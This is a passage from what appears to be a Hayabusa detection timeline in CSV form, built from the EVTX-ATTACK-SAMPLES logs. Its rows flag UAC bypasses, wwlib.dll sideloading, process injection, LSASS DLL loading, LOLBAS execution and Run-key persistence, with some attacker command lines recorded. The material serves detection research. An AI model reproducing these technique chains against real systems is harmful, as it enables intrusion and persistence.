00247C92-9E04-5F7B-0000-0010CF98272C",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_63.evtx +2020-10-05 22:28:20.530 +00:00,LAPTOP-JU4M3I0E,1,high,LatMov,MMC Spawning Windows Shell,,rules/sigma/process_creation_sysmon/proc_creation_win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_63.evtx +2020-10-05 22:28:20.530 +00:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\Windows\System32\mmc.exe | Tgt Process: C:\windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 20228 | Src PGUID: 00247C92-9E03-5F7B-0000-0010A645272C | Tgt PID: 12876 | Tgt PGUID: 00247C92-9E04-5F7B-0000-0010CF98272C,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_63.evtx 
+2020-10-05 22:28:20.530 +00:00,LAPTOP-JU4M3I0E,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_63.evtx +2020-10-06 21:40:30.910 +00:00,02694w-win10.threebeesco.com,7,medium,CredAccess,Unsigned Image Loaded Into LSASS Process,,rules/sigma/image_load/image_load_unsigned_image_loaded_into_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ImageLoad_NFSH_Sysmon_7.evtx +2020-10-06 21:40:42.943 +00:00,02694w-win10.threebeesco.com,7,medium,CredAccess,Unsigned Image Loaded Into LSASS Process,,rules/sigma/image_load/image_load_unsigned_image_loaded_into_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ImageLoad_NFSH_Sysmon_7.evtx +2020-10-06 22:11:17.572 +00:00,02694w-win10.threebeesco.com,18,info,,Pipe Connected,\winreg | Process: System | PID: 4 | PGUID: 6A3C3EF2-E683-5F7C-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_regsvc_DirectoryServiceExtPt_Lsass_NTDS_AdamXpn.evtx +2020-10-06 22:11:17.814 +00:00,02694w-win10.threebeesco.com,13,high,Exec | Persis,DLL Load via LSASS,,rules/sigma/registry_sysmon/registry_event/registry_event_susp_lsass_dll_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_regsvc_DirectoryServiceExtPt_Lsass_NTDS_AdamXpn.evtx +2020-10-06 22:11:17.848 +00:00,02694w-win10.threebeesco.com,12,high,Exec | Persis,DLL Load via LSASS,,rules/sigma/registry_sysmon/registry_event/registry_event_susp_lsass_dll_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_regsvc_DirectoryServiceExtPt_Lsass_NTDS_AdamXpn.evtx +2020-10-06 22:11:18.680 +00:00,02694w-win10.threebeesco.com,3,info,,Network Connection,tcp | Src: 172.16.66.36:64037 (01566S-WIN16-IR) | Dst: 172.16.66.143:445 (02694w-win10.threebeesco.com) | User: NT 
AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 6A3C3EF2-E683-5F7C-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_regsvc_DirectoryServiceExtPt_Lsass_NTDS_AdamXpn.evtx +2020-10-06 22:11:18.680 +00:00,02694w-win10.threebeesco.com,3,info,,Network Connection,tcp | Src: 172.16.66.143:49920 (02694w-win10.threebeesco.com) | Dst: 172.16.66.36:49670 (01566S-WIN16-IR) | User: NT AUTHORITY\SYSTEM | Process: C:\Windows\System32\lsass.exe | PID: 632 | PGUID: 6A3C3EF2-E698-5F7C-0000-00103C790000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_regsvc_DirectoryServiceExtPt_Lsass_NTDS_AdamXpn.evtx +2020-10-06 22:11:18.930 +00:00,02694w-win10.threebeesco.com,3,info,,Network Connection,tcp | Src: 172.16.66.36:64038 (01566S-WIN16-IR) | Dst: 172.16.66.143:445 (02694w-win10.threebeesco.com) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 6A3C3EF2-E683-5F7C-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_regsvc_DirectoryServiceExtPt_Lsass_NTDS_AdamXpn.evtx +2020-10-13 20:11:42.278 +00:00,LAPTOP-JU4M3I0E,1,info,,Process Created,Cmd: c:\windows\system32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: wuauclt.exe /UpdateDeploymentProvider C:\ProgramData\Intel\helpa.dll /RunHandlerComServer | LID: 0x6f859 | PID: 6372 | PGUID: 00247C92-09FE-5F86-0000-0010AC861401,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/evasion_execution_imageload_wuauclt_lolbas.evtx +2020-10-13 20:11:42.279 +00:00,LAPTOP-JU4M3I0E,1,info,,Process Created,Cmd: c:\windows\system32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: wuauclt.exe /UpdateDeploymentProvider C:\ProgramData\Intel\helpa.dll /RunHandlerComServer | 
LID: 0x6f859 | PID: 7648 | PGUID: 00247C92-09FE-5F86-0000-0010AD861401,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/evasion_execution_imageload_wuauclt_lolbas.evtx +2020-10-15 13:17:02.403 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\smartscreen.exe -Embedding | Process: C:\Windows\System32\smartscreen.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ? | LID: 0x8d824 | PID: 2656 | PGUID: 747F3D96-4BCE-5F88-0000-00103F464D00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx +2020-10-15 13:17:02.736 +00:00,MSEDGEWIN10,13,high,Persis,New RUN Key Pointing to Suspicious Folder,,rules/sigma/registry_sysmon/registry_set/registry_set_susp_run_key_img_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx +2020-10-15 13:17:02.736 +00:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_sysmon/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx +2020-10-15 13:17:02.737 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Program Files (x86)\Internet Explorer\iexplore.exe"" | Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Users\Public\tools\apt\tendyron.exe"" | LID: 0x8d824 | PID: 6392 | PGUID: 747F3D96-4BCE-5F88-0000-0010905B4D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx +2020-10-15 13:17:02.738 +00:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Users\Public\tools\apt\tendyron.exe | Tgt Process: C:\Program Files (x86)\Internet 
Explorer\iexplore.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2572 | Src PGUID: 747F3D96-4BCE-5F88-0000-001070544D00 | Tgt PID: 6392 | Tgt PGUID: 747F3D96-4BCE-5F88-0000-0010905B4D00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx +2020-10-15 13:17:02.764 +00:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Users\Public\tools\apt\tendyron.exe | Tgt Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1452 | Src PID: 2572 | Src PGUID: 747F3D96-4BCE-5F88-0000-001070544D00 | Tgt PID: 6392 | Tgt PGUID: 747F3D96-4BCE-5F88-0000-0010905B4D00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx +2020-10-15 13:17:02.765 +00:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Users\Public\tools\apt\tendyron.exe | Tgt Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1452 | Src PID: 2572 | Src PGUID: 747F3D96-4BCE-5F88-0000-001070544D00 | Tgt PID: 6392 | Tgt PGUID: 747F3D96-4BCE-5F88-0000-0010905B4D00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_injection_persistence_run_key.evtx +2020-10-17 11:38:58.613 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Font Download | URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-17 11:43:27.499 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Users\Public\tools\apt\wwlib\test.exe"" | Process: 
C:\Users\Public\tools\apt\wwlib\test.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0xa0a10 | PID: 3660 | PGUID: 747F3D96-D8DF-5F8A-0000-0010572F7200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 11:43:27.499 +00:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 11:43:31.484 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Users\Public\tools\apt\wwlib\test.exe"" | Process: C:\Users\Public\tools\apt\wwlib\test.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7} | LID: 0xa09d1 | PID: 1256 | PGUID: 747F3D96-D8E3-5F8A-0000-001029A37200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 11:43:31.484 +00:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 11:43:31.484 +00:00,MSEDGEWIN10,1,high,Exec | Evas | PrivEsc,CMSTP UAC Bypass via COM Object Access,,rules/sigma/process_creation_sysmon/proc_creation_win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 11:43:33.449 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\WINWORD.exe | Process: C:\Users\Public\tools\apt\wwlib\test.exe | PID: 1256 | PGUID: 
747F3D96-D8E3-5F8A-0000-001029A37200,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 11:43:33.449 +00:00,MSEDGEWIN10,11,low,ResDev,Creation of an Executable by an Executable,,rules/sigma/file_event/file_event_win_susp_dropper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 11:43:33.476 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\wwlib.dll | Process: C:\Users\Public\tools\apt\wwlib\test.exe | PID: 1256 | PGUID: 747F3D96-D8E3-5F8A-0000-001029A37200,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 11:43:33.495 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart | Process: C:\Users\IEUser\AppData\Roaming\WINWORD.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Users\Public\tools\apt\wwlib\test.exe"" | LID: 0xa09d1 | PID: 2920 | PGUID: 747F3D96-D8E5-5F8A-0000-0010E1BC7200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 11:43:36.306 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\rundll32.exe"" | Process: C:\Windows\SysWOW64\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart | LID: 0xa09d1 | PID: 840 | PGUID: 747F3D96-D8E8-5F8A-0000-00102CEF7200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 11:43:36.306 +00:00,MSEDGEWIN10,1,high,Exec,Microsoft Office Product Spawning Windows 
Shell,,rules/sigma/process_creation_sysmon/proc_creation_win_office_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 11:43:36.306 +00:00,MSEDGEWIN10,1,high,,Application Executed Non-Executable Extension,,rules/sigma/process_creation_sysmon/proc_creation_win_run_executable_invalid_extension.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 11:43:36.312 +00:00,MSEDGEWIN10,8,medium,,Process Injection,Src Process: C:\Users\IEUser\AppData\Roaming\WINWORD.exe | Tgt Process: | Src PID: 2920 | Src PGUID: 747F3D96-D8E5-5F8A-0000-0010E1BC7200 | Tgt PID: 840 | Tgt PGUID: 747F3D96-D8E8-5F8A-0000-00102CEF7200,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 11:43:40.902 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\explorer.exe"" | Process: C:\Windows\SysWOW64\explorer.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart | LID: 0xa09d1 | PID: 6552 | PGUID: 747F3D96-D8EC-5F8A-0000-001094207300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 11:43:40.903 +00:00,MSEDGEWIN10,8,medium,,Process Injection,Src Process: C:\Users\IEUser\AppData\Roaming\WINWORD.exe | Tgt Process: C:\Windows\SysWOW64\explorer.exe | Src PID: 2920 | Src PGUID: 747F3D96-D8E5-5F8A-0000-0010E1BC7200 | Tgt PID: 6552 | Tgt PGUID: 747F3D96-D8EC-5F8A-0000-001094207300,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 11:43:40.903 +00:00,MSEDGEWIN10,8,high,Evas 
| Exec,CACTUSTORCH Remote Thread Creation,,rules/sigma/create_remote_thread/sysmon_cactustorch.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 11:43:45.120 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\AppData\Roaming\WINWORD.exe"" | Process: C:\Users\IEUser\AppData\Roaming\WINWORD.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart | LID: 0xa09d1 | PID: 1576 | PGUID: 747F3D96-D8F1-5F8A-0000-00108B4B7300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 11:43:45.120 +00:00,MSEDGEWIN10,1,high,Exec,MS Office Product Spawning Exe in User Dir,,rules/sigma/process_creation_sysmon/proc_creation_win_office_spawn_exe_from_users_directory.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 11:43:45.130 +00:00,MSEDGEWIN10,8,medium,,Process Injection,Src Process: C:\Users\IEUser\AppData\Roaming\WINWORD.exe | Tgt Process: C:\Users\IEUser\AppData\Roaming\WINWORD.exe | Src PID: 2920 | Src PGUID: 747F3D96-D8E5-5F8A-0000-0010E1BC7200 | Tgt PID: 1576 | Tgt PGUID: 747F3D96-D8F1-5F8A-0000-00108B4B7300,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 11:43:49.229 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c ping 127.0.0.1&&del del /F /Q /A:H ""C:\Users\IEUser\AppData\Roaming\wwlib.dll"" | Process: C:\Windows\SysWOW64\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart | LID: 0xa09d1 | PID: 1680 | PGUID: 
747F3D96-D8F5-5F8A-0000-00106B6F7300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 11:43:49.229 +00:00,MSEDGEWIN10,1,low,Evas,Windows Cmd Delete File,,rules/sigma/process_creation_sysmon/proc_creation_win_cmd_delete.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 11:43:49.229 +00:00,MSEDGEWIN10,1,high,Exec,Microsoft Office Product Spawning Windows Shell,,rules/sigma/process_creation_sysmon/proc_creation_win_office_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/sideloading_uacbypass_rundll32_injection_c2.evtx +2020-10-17 11:50:02.661 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: C:\Users\IEUser\AppData\Local\Temp\{ACA8FE61-4C38-4216-A89C-9F88343DF21F}-GoogleUpdateSetup.exe | URL: http://r3---sn-5hnedn7z.gvt1.com/edgedl/release2/update2/HvaldRNSrX7_feOQD9wvGQ_1.3.36.32/GoogleUpdateSetup.exe?cms_redirect=yes&mh=Aq&mip=213.127.67.142&mm=28&mn=sn-5hnedn7z&ms=nvh&mt=1602935359&mv=m&mvi=3&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-17 12:32:08.987 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: C:\Users\IEUser\AppData\Local\Temp\{8B60600B-E6B4-4083-99F3-D3A4CFB95796}-86.0.4240.75_85.0.4183.121_chrome_updater.exe | URL: http://r2---sn-5hne6nsr.gvt1.com/edgedl/release2/chrome/W_YanCvPLKRFNu-eN8kKOw_86.0.4240.75/86.0.4240.75_85.0.4183.121_chrome_updater.exe?cms_redirect=yes&mh=ps&mip=213.127.67.142&mm=28&mn=sn-5hne6nsr&ms=nvh&mt=1602937879&mv=m&mvi=2&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 
+2020-10-17 12:32:11.026 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-17 12:32:11.318 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-17 12:32:11.574 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: SetupBinary | URL: https://oneclient.sfx.ms/Win/Prod/20.169.0823.0006/OneDriveSetup.exe,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-17 12:33:56.406 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-17 16:26:54.679 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\ProgramData\Intel\wwlib.dll | Process: C:\Windows\Explorer.EXE | PID: 3364 | PGUID: 747F3D96-19FB-5F8B-0000-0010DB270A00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx +2020-10-17 16:27:08.081 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: calc.exe | Process: C:\Windows\SysWOW64\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\ProgramData\Intel\CV.exe"" | LID: 0x8faa7 | PID: 1536 | PGUID: 
747F3D96-1B5C-5F8B-0000-001006AF2100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx +2020-10-17 16:27:08.734 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.2008.2.0_x64__8wekyb3d8bbwe\Calculator.exe"" -ServerName:App.AppXsm3pg4n7er43kdh1qp4e79f1j7am68r8.mca | Process: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.2008.2.0_x64__8wekyb3d8bbwe\Calculator.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ? | LID: 0x8faa7 | PID: 5912 | PGUID: 747F3D96-1B5C-5F8B-0000-0010A6E02100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx +2020-10-17 16:27:10.464 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\RuntimeBroker.exe -Embedding | Process: C:\Windows\System32\RuntimeBroker.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ? 
| LID: 0x8faa7 | PID: 2720 | PGUID: 747F3D96-1B5E-5F8B-0000-001034322200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx +2020-10-17 16:27:10.787 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\HCJVGQ5XQYJQFTRJAKRF.temp | Process: C:\Windows\System32\RuntimeBroker.exe | PID: 2720 | PGUID: 747F3D96-1B5E-5F8B-0000-001034322200,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx +2020-10-17 16:27:10.791 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ff99ba2fb2e34b73.customDestinations-ms~RF6f668.TMP | Process: C:\Windows\System32\RuntimeBroker.exe | PID: 2720 | PGUID: 747F3D96-1B5E-5F8B-0000-001034322200,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sideloading_wwlib_sysmon_7_1_11.evtx +2020-10-17 22:37:52.809 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-17 22:37:52.892 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-17 22:37:52.956 
+00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-17 22:37:52.991 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1a7GBU.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-17 22:37:53.047 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161340731555_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-17 22:37:53.111 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: 